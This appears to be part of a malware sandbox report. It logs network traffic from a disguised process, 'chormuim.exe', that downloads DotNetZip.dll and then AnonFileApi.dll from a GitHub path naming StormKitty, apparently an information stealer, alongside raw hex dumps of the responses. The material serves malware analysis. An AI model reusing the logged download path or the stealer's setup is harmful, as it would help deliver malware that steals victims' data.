2022-01-14 12:49:37 UTC	144	IN	Data Raw: 00 00 00 00 c6 08 fa 4b 0b 05 21 05 ed 60 00 00 00 00 c6 00 d1 3e 6d 05 22 05 ed 60 00 00 00 00 c6 00 86 3c 0b 05 24 05 ed 60 00 00 00 00 c6 00 37 2f ed 02 25 05 20 cd 01 00 00 00 c4 00 cc 2c 15 00 28 05 6c cd 01 00 00 00 81 00 96 6b 06 00 29 05 08 ce 01 00 00 00 81 00 76 51 25 0a 29 05 48 ce 01 00 00 00 81 00 65 3e 06 00 2b 05 40 cf 01 00 00 00 81 00 9b 3d 06 00 2b 05 c0 cf 01 00 00 00 81 00 98 2e 06 00 2b 05 1c d0 01 00 00 00 c6 00 b3 2c 06 00 2b 05 64 d0 01 00 00 00 81 00 32 67 42 05 2b 05 cd d0 01 00 00 00 81 00 3a 6b 5d 00 2c 05 d9 d0 01 00 00 00 81 00 d9 31 fc 20 2c 05 e3 d0 01 00 00 00 81 00 24 6c 61 17 2c 05 0c d1 01 00 00 00 91 00 b3 5c 00 21 2c 05 0c d2 01 00 00 00 81 00 e4 5c 06 00 33 05 c8 d3 01 00 00 00 81 00 c8 5c a3 16 33 05 50 d4 01 00 00 Data Ascii: K!`>m"`<$`7/% ,(lk)vQ%)He>+@=+.+,+d2gB+:k],1 ,$la,\!,\3\3P
2022-01-14 12:49:37 UTC	160	IN	Data Raw: 14 35 a9 21 00 00 9c 03 a9 21 00 00 32 15 b2 21 00 00 ce 3e 97 21 00 00 e5 11 97 21 00 00 b6 2e 97 21 00 00 a2 3c b2 21 00 00 6b 4c b2 21 00 00 9c 03 a9 21 00 00 5b 66 97 21 00 00 04 79 b6 21 00 00 ef 53 bc 21 00 00 e5 11 97 21 00 00 ce 3e 97 21 00 00 b6 2e 97 21 00 00 a2 3c b2 21 00 00 6b 4c b2 21 00 00 ad 03 a9 21 00 00 39 20 a4 21 00 00 14 35 a9 21 00 00 f5 45 b2 21 00 00 d1 6f b2 21 00 00 e5 11 97 21 00 00 ce 3e 97 21 00 00 b6 2e 97 21 00 00 a2 3c b2 21 00 00 6b 4c b2 21 00 00 35 12 b2 21 00 00 f3 6b a9 21 00 00 44 14 b2 21 00 00 09 11 a9 21 00 00 0f 47 97 21 00 00 e5 11 97 21 00 00 ce 3e 97 21 00 00 b6 2e 97 21 00 00 a2 3c b2 21 00 00 6b 4c b2 21 00 00 79 59 c1 21 00 00 12 29 9b 21 00 00 02 76 9b 21 00 00 f1 23 9b 21 00 00 73 6a 97 21 00 00 a9 23 c7 Data Ascii: 5!!2!>!!.!<!kL!![f!y!S!!>!.!<!kL!!9 !5!E!o!!>!.!<!kL!5!k!D!!G!!>!.!<!kL!yY!)!v!#!sj!#
2022-01-14 12:49:37 UTC	176	IN	Data Raw: 6e 63 65 42 61 73 65 00 67 42 61 73 65 00 4c 65 6e 67 74 68 42 61 73 65 00 43 6f 6c 6c 65 63 74 69 6f 6e 42 61 73 65 00 67 65 74 5f 49 67 6e 6f 72 65 43 61 73 65 00 73 65 74 5f 49 67 6e 6f 72 65 43 61 73 65 00 67 65 74 5f 4f 72 64 69 6e 61 6c 49 67 6e 6f 72 65 43 61 73 65 00 5f 44 6f 6e 74 49 67 6e 6f 72 65 43 61 73 65 00 69 67 6e 6f 72 65 43 61 73 65 00 62 62 61 73 65 00 70 61 73 73 70 68 72 61 73 65 00 67 65 74 5f 56 65 72 62 6f 73 65 00 73 65 74 5f 56 65 72 62 6f 73 65 00 49 6e 6e 65 72 43 6c 6f 73 65 00 53 79 73 74 65 6d 2e 49 44 69 73 70 6f 73 61 62 6c 65 2e 44 69 73 70 6f 73 65 00 50 61 72 73 65 00 41 64 6a 75 73 74 54 69 6d 65 5f 52 65 76 65 72 73 65 00 62 69 5f 72 65 76 65 72 73 65 00 72 65 63 75 72 73 65 00 42 79 74 65 55 70 64 61 74 65 00 41 64 Data Ascii: nceBasegBaseLengthBaseCollectionBaseget_IgnoreCaseset_IgnoreCaseget_OrdinalIgnoreCase_DontIgnoreCaseignoreCasebbasepassphraseget_Verboseset_VerboseInnerCloseSystem.IDisposable.DisposeParseAdjustTime_Reversebi_reverserecurseByteUpdateAd
2022-01-14 12:49:37 UTC	192	IN	Data Raw: 73 75 6c 74 00 52 65 61 64 49 6e 74 00 57 72 69 74 65 49 6e 74 00 62 73 47 65 74 49 6e 74 00 71 75 61 64 72 61 6e 74 00 72 65 70 6c 61 63 65 6d 65 6e 74 00 69 6e 63 72 65 6d 65 6e 74 00 46 69 6e 64 45 78 74 72 61 46 69 65 6c 64 53 65 67 6d 65 6e 74 00 44 65 66 6c 61 74 65 4f 6e 65 53 65 67 6d 65 6e 74 00 43 6f 6d 70 75 74 65 53 65 67 6d 65 6e 74 00 5f 4e 61 6d 65 46 6f 72 53 65 67 6d 65 6e 74 00 67 65 74 5f 43 75 72 72 65 6e 74 53 65 67 6d 65 6e 74 00 73 65 74 5f 43 75 72 72 65 6e 74 53 65 67 6d 65 6e 74 00 67 65 74 5f 43 6f 6d 6d 65 6e 74 00 73 65 74 5f 43 6f 6d 6d 65 6e 74 00 52 65 61 64 5a 69 70 46 69 6c 65 43 6f 6d 6d 65 6e 74 00 5f 47 7a 69 70 43 6f 6d 6d 65 6e 74 00 5f 63 6f 6d 6d 65 6e 74 00 45 6e 76 69 72 6f 6e 6d 65 6e 74 00 70 61 72 65 6e 74 00 Data Ascii: sultReadIntWriteIntbsGetIntquadrantreplacementincrementFindExtraFieldSegmentDeflateOneSegmentComputeSegment_NameForSegmentget_CurrentSegmentset_CurrentSegmentget_Commentset_CommentReadZipFileComment_GzipComment_commentEnvironmentparent
2022-01-14 12:49:37 UTC	208	IN	Data Raw: 00 74 00 61 00 6e 00 63 00 65 00 2e 00 00 5f 5a 00 69 00 70 00 46 00 69 00 6c 00 65 00 3a 00 3a 00 53 00 61 00 76 00 65 00 3a 00 20 00 63 00 6f 00 75 00 6c 00 64 00 20 00 6e 00 6f 00 74 00 20 00 64 00 65 00 6c 00 65 00 74 00 65 00 20 00 74 00 65 00 6d 00 70 00 20 00 66 00 69 00 6c 00 65 00 3a 00 20 00 7b 00 30 00 7d 00 2e 00 00 11 66 00 69 00 6c 00 65 00 4e 00 61 00 6d 00 65 00 00 19 6f 00 75 00 74 00 70 00 75 00 74 00 53 00 74 00 72 00 65 00 61 00 6d 00 00 35 4d 00 75 00 73 00 74 00 20 00 62 00 65 00 20 00 61 00 20 00 77 00 72 00 69 00 74 00 61 00 62 00 6c 00 65 00 20 00 73 00 74 00 72 00 65 00 61 00 6d 00 2e 00 00 51 61 00 64 00 64 00 69 00 6e 00 67 00 20 00 73 00 65 00 6c 00 65 00 63 00 74 00 69 00 6f 00 6e 00 20 00 27 00 7b 00 30 00 7d 00 27 00 20 00 Data Ascii: tance._ZipFile::Save: could not delete temp file: {0}.fileNameoutputStream5Must be a writable stream.Qadding selection '{0}'
2022-01-14 12:49:37 UTC	224	IN	Data Raw: 1d 05 08 05 20 01 1d 05 08 05 07 02 08 1d 05 05 00 00 12 81 4d 06 20 01 01 11 82 6d 06 20 01 01 11 82 71 09 20 02 12 81 51 1d 05 1d 05 0a 20 05 08 1d 05 08 08 1d 05 08 08 20 03 1d 05 1d 05 08 08 05 07 03 08 0a 08 06 07 02 1d 05 1d 05 06 20 01 1d 05 1d 05 07 07 05 08 08 08 08 08 09 07 03 12 80 99 1d 05 1d 05 06 07 03 1d 05 08 05 05 07 02 1d 05 08 08 07 04 1d 05 08 1d 05 08 07 07 03 1d 05 1d 05 08 05 07 01 12 81 01 14 07 09 12 80 99 12 80 a9 08 08 1d 05 08 08 12 81 2c 11 80 bc 04 07 01 11 55 0b 07 04 12 81 2c 11 55 0e 12 81 55 09 07 05 0a 1d 05 06 06 12 79 06 00 02 01 0e 11 5d 0b 07 07 02 02 0e 0e 0e 08 12 80 99 07 07 03 08 02 12 81 60 07 07 02 12 81 18 1d 05 06 07 02 08 11 81 04 0f 07 08 08 12 80 99 1d 05 0a 0a 12 80 a8 08 08 03 07 01 06 06 07 02 11 55 12 Data Ascii: M m q Q ,U,UUy]`U
2022-01-14 12:49:37 UTC	240	IN	Data Raw: 00 00 00 69 18 3a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 1b 4b 2c 00 00 00 00 00 00 25 18 31 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 12 28 31 4f 00 00 00 00 4f 12 0b 3a 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 0d 3c 28 45 00 00 45 1a 04 1d 23 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 28 23 31 1d 12 12 1d 10 0b 31 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 26 4b 5d 6f 5d 31 18 1a 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 26 3a 23 12 0d 1a 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 80 3f ff fe 00 0f ff f0 00 Data Ascii: i:K,%1A(1OO:-<(EE#C(#11CB&K]o]1C^&:#l?
2022-01-14 12:49:37 UTC	256	IN	Data Raw: a5 b9 48 08 c6 40 49 89 68 28 3d 98 19 3d 2b ce b1 86 25 49 49 3d c1 39 9c d4 30 da 0b 1c ea e9 8f 01 f5 91 ef f6 33 d4 23 50 a5 75 3e 3a 6d 18 a2 d5 a0 90 0a 18 55 06 4a 29 47 78 86 28 0a f3 da 08 ad 15 da ad b6 4b e9 e9 5b b8 10 b7 54 a7 1d 94 8b a5 c4 f3 f6 7f 65 ad 99 fc d7 df 7d 4f f1 b8 48 e8 06 d0 69 4f 8c c1 b3 87 ab 6a 00 08 75 c0 dc 32 74 52 04 21 41 ba ba 5a 26 3f 73 d7 33 42 8a 73 0e c7 48 a8 68 15 84 ba 79 98 40 45 19 cc 6b 80 50 1f cc 9d 82 53 bb 0e de cc 2b 60 54 84 e2 ce 7b 50 7a ec 7f 63 63 6d 0d 53 b3 3b a1 92 2e 92 38 41 bf d7 47 14 c7 b9 ab 9d 79 03 c3 c2 1e 6d 0c d8 50 5a 2e 8a e3 fc e6 cc 26 7f 16 6f 67 02 9e 6c 15 ce 6e 76 c7 71 c0 18 cf 39 89 6c 25 97 52 e6 13 50 0f ad fe d9 44 c9 f8 88 6c c5 cc 0c 44 46 08 66 13 b3 d3 ed 5a 81 93 Data Ascii: H@Ih(==+%II=903#Pu>:mUJ)Gx(K[Te}OHiOju2tR!AZ&?s3BsHhy@EkPS+`T{PzccmS;.8AGymPZ.&oglnvq9l%RPDlDFfZ
2022-01-14 12:49:37 UTC	272	IN	Data Raw: 5f 5f d2 1c 57 00 27 bd b6 b8 fd 93 5e cf ca 15 70 e6 fb ce bd 19 08 66 35 68 05 7c d1 0a c0 88 f9 c6 a3 bf c5 f3 3c d6 2e 5d e7 d2 cd 37 28 92 2e ed 27 ef b1 bb bb cb b8 dd a6 21 13 87 9e bc 00 d5 9f af e1 b1 ce 4c 38 f2 3c d3 c3 44 66 d6 59 78 09 f1 74 aa a7 0f 15 79 c1 b0 3f 64 34 f8 39 61 2d a4 d6 dc 60 7d f5 15 8a 64 c8 b8 fb 90 f6 e6 2f f0 3c 31 6f 30 58 f9 1c 4e b8 86 1b 5d c1 1d bc af 85 32 cf 73 2a 67 7e e8 46 60 74 01 9a 98 7a 75 ae 5a 00 aa ea 98 55 37 c3 09 53 c8 cb b2 24 91 f3 04 6c e9 f5 00 1a 11 37 ab cd 4b 42 0f 15 4e d8 0b 2c bf 0b 31 bc 89 30 54 a1 86 89 27 d0 cf a5 57 52 16 05 49 9e eb f9 00 c3 c1 80 46 73 40 7d 2a 86 94 26 b1 04 7e 49 85 67 ce 3d 58 74 ed d5 6f a6 ce 2d cb 32 26 93 09 83 41 9f d5 d5 35 be f0 f9 2f b0 b3 bb cb 9b 6f fe Data Ascii: __W'^pf5h\|<.]7(.'!L8<DfYxty?d49a-`}d/<1o0XN]2sg~F`tzuZU7S$l7KBN,10T'WRIFs@}&~Ig=Xto-2&A5/o
2022-01-14 12:49:37 UTC	288	IN	Data Raw: 98 49 c7 2b 97 68 4f 67 33 fc e8 81 8f 9f ee 57 db db 3b bb 7f 5e af d7 a7 00 8e c0 c0 e1 19 7f c9 26 bf ac 04 d2 c2 9f 65 f2 cb b3 be 6c da cb b1 7c 60 b1 f0 03 d9 cf f4 57 5a e8 e5 f1 65 2b 80 f4 58 74 f1 d2 96 80 9c 3f 40 a1 44 d2 d8 3e d8 79 10 68 38 02 b3 0a 8e 00 d4 b7 b7 b7 97 b7 b7 b7 b7 aa d5 ea 5f 35 46 57 af 17 df 1e 7f e7 a5 8d fd da ef 7e 63 15 2b cb 15 11 46 44 1c 03 92 8b a0 f0 94 d9 38 9a 47 ee 01 08 61 20 be 3f b9 a0 05 48 72 01 e4 0a 39 39 1b 8e ed 9b cf c4 ae 2b b2 e1 00 e0 f0 70 5f 94 27 1b 26 23 e4 cc e7 0b d0 75 1d 17 2f 5e 14 ca 81 71 e8 cd e0 38 0e 82 20 40 bb dd 46 10 04 18 8f 86 50 79 3c df 34 ad 39 c1 96 b3 05 e5 30 a6 6c 25 10 3e 41 42 49 78 82 dc 91 98 ce 9f 01 a7 0a 23 6e e5 d9 97 a3 f1 98 35 fd 3c 77 0e 57 ae 5e 45 ab d1 c0 Data Ascii: I+hOg3W;^&el\|`WZe+Xt?@D>yh8_5FW~c+FD8Ga ?Hr99+p_'&#u/^q8 @FPy<490l%>ABIx#n5<wW^E
2022-01-14 12:49:37 UTC	304	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 65 85 fd 15 69 8a ff 47 9c bd ff 24 70 92 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 6b 8c f0 15 65 86 ff 30 85 a6 ff 17 6b 8d ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 73 95 dc 13 5c 7b ff 21 77 98 ff 30 86 a8 ff 2f 74 95 a9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 74 95 a9 13 5e 7d ff 10 4e 68 ff 34 89 aa ff 26 73 95 e9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: eiG$p"ke0k*s\{!w0/t/t^}Nh4&s
2022-01-14 12:49:37 UTC	320	IN	Data Raw: d2 e5 71 94 48 e2 24 61 67 77 9f f7 2e 7d 84 e3 b9 fc ca af fe 12 bf f0 cb 7f 9e af 7c 2d e4 77 bf 72 9b 2b 1f dd 62 6f 77 9f e9 34 42 26 29 5a a5 64 f3 1d f2 29 d4 6a 1f 99 de 41 26 57 91 d1 87 a4 e1 0f 51 e9 6d 84 b7 4a 7f eb d3 74 46 67 79 fc b1 0b 3d e0 d9 bf f3 37 7f e1 97 5b 5e c0 52 ee 53 3e 81 15 81 ea ed 7d 1b b8 eb 4e c3 79 72 54 4f bf c1 a8 ad ed e8 22 9c d9 b7 7f 04 f0 57 5c 08 a6 63 50 d7 fc 0b 86 d3 a0 a1 5c 4c 40 b7 b7 ed 1b 0a a6 c1 fa 33 51 4a 11 a7 09 e3 71 c8 64 12 71 fe 91 5f 64 65 d8 47 29 85 52 1a a5 15 89 94 b8 be 4f 18 66 8c 9f 2a 89 92 8a 54 4a 94 92 ec ed ed a1 94 66 3c de cf 56 46 52 1a b7 bf ce 78 12 e2 b9 d9 d4 e7 eb b7 ee 30 8a 86 fc ca af fe 02 93 c9 94 df fd 9d 6f 32 9e ee f2 17 fe 4c 56 3b 47 f4 e8 04 1e ae ab 11 42 e4 8a Data Ascii: qH$agw.}\|-wr+bow4B&)Zd)jA&WQmJtFgy=7[^RS>}NyrTO"W\cP\L@3QJqdq_deG)ROf*TJf<VFRx0o2LV;GB
2022-01-14 12:49:37 UTC	336	IN	Data Raw: e2 c4 fe 34 03 f6 3d 2e d5 7f be cb e5 ef 31 14 5b 54 fd ce 25 bb ad fa 9b c5 99 12 c7 9e a8 7e 6f da 83 55 3f 79 50 ca a8 08 20 11 18 9a a0 58 30 08 83 78 a6 e0 9a 8b ae 49 9c 7c c8 d5 85 2b ac ac 2c 21 8d 5b d0 ca 47 98 9d 87 8b 97 17 b9 e1 ae ff 91 b9 83 47 d0 d4 1a 5e f5 0c a1 73 05 37 5c 41 39 eb f8 41 9d 9c a5 23 74 ad 33 18 a8 9d 95 16 d7 5a bd 7d 24 b5 aa 47 ad ba ce fc ac 45 2e 6f 51 28 da d8 b6 85 61 ea 08 02 20 24 97 d3 98 99 9d 9b 7a d9 9d b7 3e f0 7d df b3 f6 ed cf 7d 65 a1 46 3f 09 07 19 84 2c 0c 32 04 59 45 81 b4 b0 2f 6a ec cf c2 20 5d 4a 9d f8 a8 64 c0 d4 58 06 a8 7e ff f9 56 ba f4 86 cb e8 b2 bb 7d d5 ef 4d bb 3f ee 17 b2 a2 af 15 77 6a 1c 2a 9e 6c 4d 17 98 42 c7 d0 15 8a 10 3b d0 11 02 ea 75 13 4d 05 9c 3b 77 1e c3 d0 91 52 c3 30 4c 34 Data Ascii: 4=.1[T%~oU?yP X0xI\|+,![GG^s7\A9A#t3Z}$GE.oQ(a $z>}}eF?,2YE/j ]JdX~V}M?wj*lMB;uM;wR0L4
2022-01-14 12:49:37 UTC	352	IN	Data Raw: f7 ff 83 e3 f8 ff 82 e2 f8 ff 81 e2 f8 ff 80 e2 f8 ff 7f e1 f8 ff 76 a7 bc ff aa 91 83 ff 88 9c a8 ff 6a ae cc ff 73 d2 ed ff 7a df f7 ff 79 df f7 ff 71 cd f1 ff 62 d3 ed ff 9d c4 bf ff ff a1 63 ff 9d d0 d0 ff 8c ce e6 ff 00 00 00 40 00 00 00 40 00 00 00 3f 00 00 00 39 00 00 00 2b 00 00 00 17 00 00 00 08 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 92 d5 ee 3e 95 d7 f1 a5 91 d6 f1 e2 90 d6 f2 fd 8e da f4 ff 8c dd f6 ff 8a e1 f7 ff 89 e4 f9 ff 88 e5 f9 ff 86 e4 f9 ff 85 e4 f9 ff 84 e3 f9 ff 83 e3 f8 ff 82 e3 f8 ff 81 e2 f8 ff 80 e1 f8 ff a1 be c8 ff c6 c2 c0 ff ae a4 9f ff 86 80 7e ff 71 c7 e1 ff 7b df f7 ff 7a df f7 ff 71 cd f1 ff 5d d0 ec ff 9b c9 c6 ff ff Data Ascii: vjszyqbc@@?9+>~q{zq]
2022-01-14 12:49:37 UTC	368	IN	Data Raw: 46 b3 46 ff 89 21 c0 ef 4a 9d 82 ff e9 11 0c 6b f0 88 fc 92 9f 80 73 83 59 aa db 74 b0 fc c9 14 55 19 18 42 08 ab b4 2d e5 d8 65 55 f1 aa 08 21 55 c4 b8 51 e0 9a 7d 20 90 6c 64 36 d2 56 ad 63 1e 2c ec c8 68 44 ca 00 72 56 44 0e ae 6d cf 17 15 35 ba 46 31 1c 92 8f 10 c8 5f 75 fa 66 fe ea 41 91 f1 77 ee 81 25 7f 83 ad 80 b4 21 c3 99 ed 64 1d 51 98 5a 13 9f 3b 5f d4 ea 22 1e e9 5c dd 95 71 3e 89 e6 df 23 98 43 59 6b 85 15 3b 8e 28 31 9c c4 d3 29 c6 37 53 e2 8b 71 bb c0 7c cf 02 ca 35 21 06 da f1 e0 d0 76 25 31 7d b2 d3 97 5c e8 f6 05 7d a7 fe 71 2f eb 1f 4f b8 c6 60 74 8a 7b 1b 31 d9 31 a1 cd a9 da e0 2f f4 32 98 cd 0d 95 8f 93 e5 99 07 06 7b e7 31 ab ad 3e 2a 57 3c 5a 47 74 12 cf 66 34 b0 7e c5 89 60 f0 91 b8 1d 79 2e 55 f4 82 a0 e7 0a d5 0a 4b 5d 69 13 d9 Data Ascii: FF!JksYtUB-eU!UQ} ld6Vc,hDrVDm5F1_ufAw%!dQZ;_"\q>#CYk;(1)7Sq\|5!v%1}\}q/O`t{11/2{1>*W<ZGtf4~`y.UK]i
2022-01-14 12:49:37 UTC	384	IN	Data Raw: 85 97 c9 78 70 5d d2 5c 83 ea 18 60 1b 03 cb 8c 90 fc 92 a5 93 71 af 75 c5 63 61 09 79 cf a4 ba 6f 47 c9 1f 3c c8 91 2c f1 7c 3f de 2b 8c 37 75 3e b8 2e 33 76 5c 27 5c 5c f1 b6 ea ea bc 10 57 a1 fe 03 53 99 f8 d7 93 86 27 ac f4 e2 bc 82 1a ee 95 ed ac 79 79 17 28 eb 72 59 b2 09 a0 76 c7 ef e6 57 5f 9b 35 ae b2 3d 11 2b c7 6d 57 74 4d a9 5f a3 93 73 7e 0c 84 db a8 28 3f 1f 82 0b f5 e9 04 c4 4d a2 6a 6f 96 59 05 8b a8 62 d9 02 2f f1 10 77 b2 16 73 6a 53 6f 6a a4 bf 15 5f 2e 57 a5 6d ac 32 f6 f9 d6 38 77 27 5f d0 7a 24 ad ea 24 85 6a 22 d2 d9 d5 1b cb ea 6f ec d7 93 0d 55 07 68 c8 a9 bf 8d e9 c4 4b 17 f5 13 29 61 0c dc 46 87 56 40 86 86 91 38 46 c1 71 f3 07 7e 1b 09 64 05 de ee 9d c4 dc fc de 33 40 99 e0 d5 43 19 cb 6e 80 f6 f8 53 44 2f ea 35 8b 43 96 f6 c0 Data Ascii: xp]\`qucayoG<,\|?+7u>.3v\'\\WS'yy(rYvW_5=+mWtM_s~(?MjoYb/wsjSoj_.Wm28w'_z$$j"oUhK)aFV@8Fq~d3@CnSD/5C
2022-01-14 12:49:37 UTC	400	IN	Data Raw: 11 1f 38 a8 13 35 df 0b ea 7b 21 44 e1 cb 7f c1 9f 68 08 30 9f c6 1a 90 73 75 25 67 22 0e b6 90 73 0a 04 d1 de a2 2d 84 94 54 5e 85 76 26 4b 7c 5d 3e 84 ae ba 45 10 ab db dd d1 65 20 64 96 de f8 2b 6f 59 45 cc bb 92 9a 6f 5e c9 5b 2e 71 27 bd 19 00 39 3d 51 8b d5 3f af c9 1a 3e b3 94 9b 16 bc b7 5c 9a 84 c5 72 b1 93 be 48 e7 e2 4f ad d2 ff 16 28 ee 28 07 cd 4e 60 4b a0 9e 33 3a 3d 41 e7 df 4e 14 df c9 81 51 82 2e 42 97 d7 6d d4 87 6b cb f6 72 1f de 67 fc 08 54 c3 3b 46 b9 ab 66 dd 10 bf e9 d6 5d f4 05 c8 bb 85 c5 6a 75 88 98 e5 62 f3 d9 d4 2c 03 ad 59 96 56 2e 39 44 34 ad 0b d2 b7 86 66 0b ee 1d 53 9c 82 7f 36 80 14 1b 35 bb 10 e4 2b de 73 ba 8e 3f 45 25 1d 9d 5b 51 e0 bd 1f f9 17 3e 7e e5 76 62 4c 1f d0 3a 19 e6 ec 8e 8b 18 fa 2a 2c 8c 72 31 97 ce 33 3c Data Ascii: 85{!Dh0su%g"s-T^v&K\|]>Ee d+oYEo^[.q'9=Q?>\rHO((N`K3:=ANQ.BmkrgT;Ff]jub,YV.9D4fS65+s?E%[Q>~vbL:*,r13<
2022-01-14 12:49:37 UTC	416	IN	Data Raw: 39 52 6f 8c d3 07 73 f8 f9 db 6f 1a 4a 6e 46 c5 f3 15 ea d5 bf 3a f2 54 70 c3 99 bf ab 0a 18 88 46 75 d0 85 f6 dd 48 bd 0d 3e 32 03 e2 47 75 dc 8e 18 05 20 e1 b4 b8 dc 76 9e 95 4f af 02 49 05 f0 7e 69 56 f4 27 f0 7e 6a f7 e2 a5 f8 f5 2c 44 d5 42 7c ac 7f 35 5a be 21 13 95 6b ea 85 3f ce 3f 0b 8f f9 85 59 18 29 06 7d cb 55 3d 38 70 25 e3 b8 dc 42 30 73 56 65 1c 50 73 5c 3e c4 ad 70 b7 2e c9 83 65 3c 2b 16 61 a6 b0 18 65 f9 9a 09 ba a1 1d 49 4d b8 60 df fb 9d ee 24 50 c7 c5 dd 8c b6 45 a6 5a 8f 39 32 c2 e8 7d 6d 0b 8c b7 27 f6 5a eb a9 3f 38 5e 20 ab 3b 19 65 43 78 bc e2 31 83 af 3b 79 ab a2 75 e4 db a8 9b 9f 43 2c 7c a4 ae 36 82 10 c2 7e cb 88 c6 e9 59 fd cc e0 b2 de b6 17 0d 53 0f 20 0d bf c3 e8 9e d8 9b a2 66 55 a3 98 84 ed 49 d1 42 12 40 cf ff 20 cf 4f Data Ascii: 9RosoJnF:TpFuH>2Gu vOI~iV'~j,DB\|5Z!k??Y)}U=8p%B0sVePs\>p.e<+aeIM`$PEZ92}m'Z?8^ ;eCx1;yuC,\|6~YS fUIB@ O
2022-01-14 12:49:37 UTC	432	IN	Data Raw: f6 41 66 84 0f 5c bb 9c 00 c6 47 0f 43 88 d7 39 88 71 b7 83 b4 76 31 e0 f2 a5 30 c2 4f c3 e7 47 3f fe 3f cf 7f 3f 0d d1 8a 5e 3b 00 49 5d 72 10 37 55 41 11 2b 17 0e ec da 0a 4c 5f 67 48 0d f5 83 0a 7e 17 54 cb 00 8a 30 7f d2 70 ff e3 85 fc 64 ff 3d 1c cf 48 ed 61 f8 ef 97 4f c9 f8 6f a9 58 9f 29 dd fd d0 54 55 0a a6 a7 8d 21 30 1a e3 e0 13 0a f4 3a 11 30 f0 d9 37 b0 4e 02 74 8e 18 fc 1a 24 84 df 63 38 9e 91 9a 26 7f ec 5d fc f1 2a 4f 50 8d 83 b1 c0 b9 8f c5 de 1f 23 e8 87 68 5c a7 a2 b8 c8 19 11 05 bb 8e 1c 87 9f 1d fd c0 ec 52 6e 0f bd a6 8b 13 d8 2c 4d f6 6f 95 59 d1 db fa 3e a7 0b e4 5a c3 b1 fc 37 46 f8 09 5f 08 7f e0 de 39 47 3d 09 b8 7e 26 22 e7 45 cc dd 8b d8 ff 2e b6 a2 de 06 31 c4 34 4b fa a2 5a 7a db 99 ad 52 56 18 57 1a 72 be 4d 76 24 40 20 9f Data Ascii: Af\GC9qv10OG???^;I]r7UA+L_gH~T0pd=HaOoX)TU!0:07Nt$c8&]*OP#h\Rn,MoY>Z7F_9G=~&"E.14KZzRVWrMv$@
2022-01-14 12:49:37 UTC	448	IN	Data Raw: 6e 00 61 00 6d 00 65 00 00 00 44 00 6f 00 74 00 4e 00 65 00 74 00 5a 00 69 00 70 00 2e 00 64 00 6c 00 6c 00 00 00 40 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 31 00 2e 00 31 00 33 00 2e 00 38 00 2e 00 37 00 37 00 30 00 64 00 36 00 30 00 00 00 3a 00 09 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 31 00 2e 00 31 00 33 00 2e 00 38 00 2e 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: nameDotNetZip.dll@ProductVersion1.13.8.770d60:Assembly Version1.13.8.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49746	185.199.108.133	443	C:\Users\user\AppData\Local\Temp\chormuim.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-14 12:49:38 UTC	448	OUT	GET /caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll HTTP/1.1 Host: raw.githubusercontent.com
2022-01-14 12:49:38 UTC	449	IN	HTTP/1.1 200 OK Connection: close Content-Length: 300544 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/octet-stream ETag: "cc6dc56c352613c5b4272fcd332d3be900cd320280b4b5bf6cc016484cf0c08e" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 7162:11EF7:FD2D24:107187F:61E17162 Accept-Ranges: bytes Date: Fri, 14 Jan 2022 12:49:38 GMT Via: 1.1 varnish X-Served-By: cache-mxp6923-MXP X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1642164578.389187,VS0,VE189 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: f5b7602207105d6c1598d1bfd9fd019e5c6fffae Expires: Fri, 14 Jan 2022 12:54:38 GMT Source-Age: 0
